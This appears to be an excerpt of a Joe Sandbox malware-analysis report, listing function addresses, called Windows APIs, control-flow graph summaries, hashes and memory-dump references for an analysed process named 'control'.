                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 4e1e35f1b0f76acc668f842f2e8dd4b638e4ecd38ae8c3fb96068f419b11f9f8
                                                          • Instruction ID: 169ad5df260164f98d2d2c6456254d2e61a6aba2446aafc69737e0c58277bc89
                                                          • Opcode Fuzzy Hash: 4e1e35f1b0f76acc668f842f2e8dd4b638e4ecd38ae8c3fb96068f419b11f9f8
                                                          • Instruction Fuzzy Hash: 9C90022921340006F1807158540860A00558BD1207F95D915B101E558CC915D9AD6362
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04822EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047B0000, based on PE: true
                                                          • Associated: 00000007.00000002.4443991237.00000000048D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.4443991237.00000000048DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_47b0000_control.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 8c06b99e34c59d4c56bd25cb194063b100882b16166e25f727d16781d75423b1
                                                          • Instruction ID: e18e9d00eddddda3afa2c7a971fa0bb0cadff4a999bb7ccfcf27faf038ac5c4b
                                                          • Opcode Fuzzy Hash: 8c06b99e34c59d4c56bd25cb194063b100882b16166e25f727d16781d75423b1
                                                          • Instruction Fuzzy Hash: 6690027120140406F1407158440474600558BD0306F55C511B606D554E8659DED976A6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04822FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047B0000, based on PE: true
                                                          • Associated: 00000007.00000002.4443991237.00000000048D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.4443991237.00000000048DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_47b0000_control.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: f98460c7fbbeea4100fde982068fd266b23ab6c4d753fb81e0aa47ce3dd89612
                                                          • Instruction ID: 4127d41b1d1c4aecf58be6fb405d85502b6f1a2334d7825e6150d36e12036f9f
                                                          • Opcode Fuzzy Hash: f98460c7fbbeea4100fde982068fd266b23ab6c4d753fb81e0aa47ce3dd89612
                                                          • Instruction Fuzzy Hash: 47900221211C0046F20075684C14B0700558BD0307F55C615B115D554CC915D9A56562
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04822F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047B0000, based on PE: true
                                                          • Associated: 00000007.00000002.4443991237.00000000048D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.4443991237.00000000048DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_47b0000_control.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: dfaacb43abd7f607c34961e7dfd76b1eefe098bc599e320e4cfcff90b4d0d83d
                                                          • Instruction ID: 268cafd57079f6c4b23ee7342370a8fa749966f76f5e0748a0c94a508e6b1216
                                                          • Opcode Fuzzy Hash: dfaacb43abd7f607c34961e7dfd76b1eefe098bc599e320e4cfcff90b4d0d83d
                                                          • Instruction Fuzzy Hash: 6690026134140446F10071584414B060055CBE1306F55C515F206D554D8619DD967167
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04822AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047B0000, based on PE: true
                                                          • Associated: 00000007.00000002.4443991237.00000000048D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.4443991237.00000000048DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_47b0000_control.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 5cf4f21558c7bde378440e8d2048aeb3ae2225753d9c5b37579549f6e380ab75
                                                          • Instruction ID: 76b33967b278927043083f24822f33dc2f593859df493a15b7974a4dd493dccb
                                                          • Opcode Fuzzy Hash: 5cf4f21558c7bde378440e8d2048aeb3ae2225753d9c5b37579549f6e380ab75
                                                          • Instruction Fuzzy Hash: A9900225211400072105B558070450700968BD5356355C521F201E550CD621D9A56162
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04822BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047B0000, based on PE: true
                                                          • Associated: 00000007.00000002.4443991237.00000000048D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.4443991237.00000000048DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_47b0000_control.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 07f05b5868e6ad316c207bbb64fecc77dd92676c8aba90fb951f885668daf835
                                                          • Instruction ID: 68541497916bca0676c6dbf543d79f6577d16d16fab42bf7089e21e067d90de2
                                                          • Opcode Fuzzy Hash: 07f05b5868e6ad316c207bbb64fecc77dd92676c8aba90fb951f885668daf835
                                                          • Instruction Fuzzy Hash: B690023120544846F14071584404A4600658BD030AF55C511B106D694D9625DE99B6A2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04822BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047B0000, based on PE: true
                                                          • Associated: 00000007.00000002.4443991237.00000000048D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.4443991237.00000000048DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_47b0000_control.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: dd86d175d1f4dd9736efd0fa14a86c2d31c13338320aced36e0b6b4bfcce7cef
                                                          • Instruction ID: b68db19799d9f4d07593a357755404296430646b7fb474fcfebc521f8724dc15
                                                          • Opcode Fuzzy Hash: dd86d175d1f4dd9736efd0fa14a86c2d31c13338320aced36e0b6b4bfcce7cef
                                                          • Instruction Fuzzy Hash: D290023120140806F1807158440464A00558BD1306F95C515B102E654DCA15DB9D77E2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04822B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047B0000, based on PE: true
                                                          • Associated: 00000007.00000002.4443991237.00000000048D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.4443991237.00000000048DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_47b0000_control.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 2dfc96beb39183b66fabc61de6b22217c945a3982ed165c4b7819c42c1d15b22
                                                          • Instruction ID: 969afad9c224d2b8cb605bf38599dd1e7bbc522253727e4cc4627f4176467efb
                                                          • Opcode Fuzzy Hash: 2dfc96beb39183b66fabc61de6b22217c945a3982ed165c4b7819c42c1d15b22
                                                          • Instruction Fuzzy Hash: 2290026120240007610571584414616405A8BE0206B55C521F201D590DC525D9D57166
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 048235C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047B0000, based on PE: true
                                                          • Associated: 00000007.00000002.4443991237.00000000048D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.4443991237.00000000048DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_47b0000_control.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 4e555d2ceb8b1492cf6cdcf8bf88834ee350f14be790e5a41aa07d8eaec0623f
                                                          • Instruction ID: 1fa1e818fa94cfe711d16ed91bdf7d9ad412545cdc4d5e105869af2023ed3cf9
                                                          • Opcode Fuzzy Hash: 4e555d2ceb8b1492cf6cdcf8bf88834ee350f14be790e5a41aa07d8eaec0623f
                                                          • Instruction Fuzzy Hash: 4C90023160550406F1007158451470610558BD0206F65C911B142D568D8795DA9575E3
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 025B9080 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 243 25b9080-25b90c2 call 25bbd40 248 25b90c8-25b9118 call 25bbe10 call 25aacf0 call 25b4e50 243->248 249 25b919c-25b91a2 243->249 256 25b9120-25b9131 Sleep 248->256 257 25b9133-25b9139 256->257 258 25b9196-25b919a 256->258 259 25b913b-25b9161 call 25b8ca0 257->259 260 25b9163-25b9183 257->260 258->249 258->256 261 25b9189-25b918c 259->261 260->261 262 25b9184 call 25b8eb0 260->262 261->258 262->261
                                                          APIs
                                                          • Sleep.KERNELBASE(000007D0), ref: 025B9128
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_25a0000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: net.dll$wininet.dll
                                                          • API String ID: 3472027048-1269752229
                                                          • Opcode ID: b9bcff13a90b1ba5da00e8373b1a167007188958bc0109db7198ece4eb4567d8
                                                          • Instruction ID: bcda807f42c567913c510180fdba24d414280370654c189a55ec0f56a6fc4f94
                                                          • Opcode Fuzzy Hash: b9bcff13a90b1ba5da00e8373b1a167007188958bc0109db7198ece4eb4567d8
                                                          • Instruction Fuzzy Hash: F83181B6500345BBC725DF64C889FABB7B9BF88B00F10851DFA2A5B245D670B550CFA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 025B9076 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 86sleepCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 265 25b9076-25b907b 266 25b9089-25b9091 265->266 267 25b907d 265->267 269 25b9092-25b90c2 call 25bbd40 266->269 268 25b907f-25b9087 267->268 267->269 268->266 273 25b90c8-25b9118 call 25bbe10 call 25aacf0 call 25b4e50 269->273 274 25b919c-25b91a2 269->274 281 25b9120-25b9131 Sleep 273->281 282 25b9133-25b9139 281->282 283 25b9196-25b919a 281->283 284 25b913b-25b9161 call 25b8ca0 282->284 285 25b9163-25b9183 282->285 283->274 283->281 286 25b9189-25b918c 284->286 285->286 287 25b9184 call 25b8eb0 285->287 286->283 287->286
                                                          APIs
                                                          • Sleep.KERNELBASE(000007D0), ref: 025B9128
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_25a0000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: net.dll$wininet.dll
                                                          • API String ID: 3472027048-1269752229
                                                          • Opcode ID: 0fdc86c8d20166a41834de3b1449d8c099ef4c3b13db36b32f59b79f259050c8
                                                          • Instruction ID: e548a1d8d874a743918cce0a72695f577ea67a71cf2e31c8cd04baca519177c9
                                                          • Opcode Fuzzy Hash: 0fdc86c8d20166a41834de3b1449d8c099ef4c3b13db36b32f59b79f259050c8
                                                          • Instruction Fuzzy Hash: F331CEB1500345ABC725EF64C885FABBBB8BF84B00F00805DEA296B245D770A650CFA9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 025BA670 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 296 25ba670-25ba6a1 call 25baf60 RtlFreeHeap
                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,025A3AF8), ref: 025BA69D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_25a0000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID: .z`
                                                          • API String ID: 3298025750-1441809116
                                                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                          • Instruction ID: 05b2119cca9116fdc434a327a27c7f1528b1a5ff0fc6d1b3135cbaeb13f15d63
                                                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                          • Instruction Fuzzy Hash: 9FE012B6200208ABDB18EF99CC48EE777ADEF88750F118558BA085B241C630E910CAB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 025A8308 Relevance: 3.1, APIs: 2, Instructions: 57threadwindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 299 25a8308-25a831f 300 25a8328-25a835a call 25bca00 call 25aacf0 call 25b4e50 299->300 301 25a8323 call 25bbe60 299->301 308 25a838e-25a8392 300->308 309 25a835c-25a836e PostThreadMessageW 300->309 301->300 310 25a838d 309->310 311 25a8370-25a838b call 25aa480 PostThreadMessageW 309->311 310->308 311->310
                                                          APIs
                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 025A836A
                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 025A838B
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_25a0000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
                                                          • API String ID: 1836367815-0
                                                          • Opcode ID: d2584c719f1219365c2475db5b926260234e87cbe8874a743507a630b8dfc769
                                                          • Instruction ID: 37edd491cb1987dd47e9596818514368732b9ffd96e2c8f5ba830c86bc7f728f
                                                          • Opcode Fuzzy Hash: d2584c719f1219365c2475db5b926260234e87cbe8874a743507a630b8dfc769
                                                          • Instruction Fuzzy Hash: B201D831A902297BEB21A650DC52FFF7B2C6F40B51F044159FF04BA1C1D6A465054BE9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 025A8310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 025A836A
                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 025A838B
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_25a0000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
                                                          • API String ID: 1836367815-0
                                                          • Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                                          • Instruction ID: 980c0687e57e06630047df936b5cb7bbacb40b2661e52c208c447cd65bf4557a
                                                          • Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                                          • Instruction Fuzzy Hash: BD018F31A802297AE721A6949C52FFE7B6D6F80B51F040159FF04BA1C1E6A469064AEA
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 025AACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 524 25aacf0-25aad19 call 25bcc50 527 25aad1b-25aad1e 524->527 528 25aad1f-25aad2d call 25bd070 524->528 531 25aad2f-25aad3a call 25bd2f0 528->531 532 25aad3d-25aad4e call 25bb4a0 528->532 531->532 537 25aad50-25aad64 LdrLoadDll 532->537 538 25aad67-25aad6a 532->538 537->538
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 025AAD62
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_25a0000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                          • Instruction ID: 2dde0237cb8a342527b379451598a7f404e66ebf479aa09b3daf53144b4bf1ca
                                                          • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                          • Instruction Fuzzy Hash: DD011EB5D0020EABDF10DBA4DC46FDDB7B9AF54309F0045A5A90897240FA71E714CB95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 025BA6E0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 539 25ba6e0-25ba738 call 25baf60 CreateProcessInternalW
                                                          APIs
                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 025BA734
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_25a0000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateInternalProcess
                                                          • String ID:
                                                          • API String ID: 2186235152-0
                                                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                          • Instruction ID: 4ca90ab491b2d2756fa574da93286237e5eec9c811df46884fce7c96f7e4a821
                                                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                          • Instruction Fuzzy Hash: D001AFB2210108BBCB54DF89DC80EEB77ADAF8C754F158258BA0D97240C630E851CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 025B91B0 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 542 25b91b0-25b91d8 call 25b4e50 545 25b91da-25b91f6 call 25bf222 CreateThread 542->545 546 25b91f7-25b91fc 542->546
                                                          APIs
                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,025AF050,?,?,00000000), ref: 025B91EC
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_25a0000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID:
                                                          • API String ID: 2422867632-0
                                                          • Opcode ID: ecacb28e533d931049fcac73acfce2faf05e3b67876ae05ce95fa90aefa457bb
                                                          • Instruction ID: 8c3cd58096f479213c37159b7d148a276c958501af7a2c9fe64239ac2ab63f47
                                                          • Opcode Fuzzy Hash: ecacb28e533d931049fcac73acfce2faf05e3b67876ae05ce95fa90aefa457bb
                                                          • Instruction Fuzzy Hash: AEE06D373802043AE2316599AC02FEBB29C9F81B20F140026FA0DEA6C1D995F40146A9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 025BA630 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(025B4536,?,025B4CAF,025B4CAF,?,025B4536,?,?,?,?,?,00000000,00000000,?), ref: 025BA65D
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_25a0000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                          • Instruction ID: 8ef8cb55f7aafcde5f90cef4e8ea04ef0e0e8efa26642fb7aeba9fb428560eae
                                                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                          • Instruction Fuzzy Hash: 8BE012B6200208ABDB14EF99CC44EE777ADEF88654F118558BA085B241C630F910CAB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 025BA7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,025AF1D2,025AF1D2,?,00000000,?,?), ref: 025BA800
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_25a0000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                          • Instruction ID: 090d154f4da0b599836c0d85567e58684e0abffe01c1a6ad863a2f38d7f26603
                                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                          • Instruction Fuzzy Hash: 8FE01AB52002086BDB10DF49CC84EE737ADEF88650F118154BA0857241C930E8108BF5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 025AF6D0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00008003,?,025A8D14,?), ref: 025AF6FB
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_25a0000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                          • Instruction ID: 7bd7c2a10cbd0c3f55b4387ea3dc769c3fe5b27996a90b7e595d66eb2044cf6e
                                                          • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                          • Instruction Fuzzy Hash: 44D05E656503093AE610AAA89C13F6632896B44B44F490064F948972C3D950F0008569
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04822C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047B0000, based on PE: true
                                                          • Associated: 00000007.00000002.4443991237.00000000048D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.4443991237.00000000048DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_47b0000_control.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 6757e22fc6f5a50f2196917389e9a3caae4d96b91d92d6c2ab86fc957d7e2c07
                                                          • Instruction ID: 5eadb18128d441f882893ba918dc41605474c3a5104d6f15ce4daa836294c4fd
                                                          • Opcode Fuzzy Hash: 6757e22fc6f5a50f2196917389e9a3caae4d96b91d92d6c2ab86fc957d7e2c07
                                                          • Instruction Fuzzy Hash: B4B09B719015D5C9FB11F760470871779506BD0705F15C561E3038641E4738D1D5F1B6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 0006860F Relevance: 3.8, APIs: 3, Instructions: 89memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,0006761A,?,?), ref: 0006869C
                                                          • HeapFree.KERNEL32(00000000,?,?,0006761A,?,?), ref: 000686A3
                                                          • memset.MSVCRT ref: 000686EF
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443192720.0000000000060000.00000040.80000000.00040000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                          • Associated: 00000007.00000002.4443192720.000000000006D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_60000_control.jbxd
                                                          Similarity
                                                          • API ID: Heap$FreeProcessmemset
                                                          • String ID:
                                                          • API String ID: 1846762186-0
                                                          • Opcode ID: de053a9d3eb23efd5fb403868795c2873a637a044f3de3db5eaff919a7707501
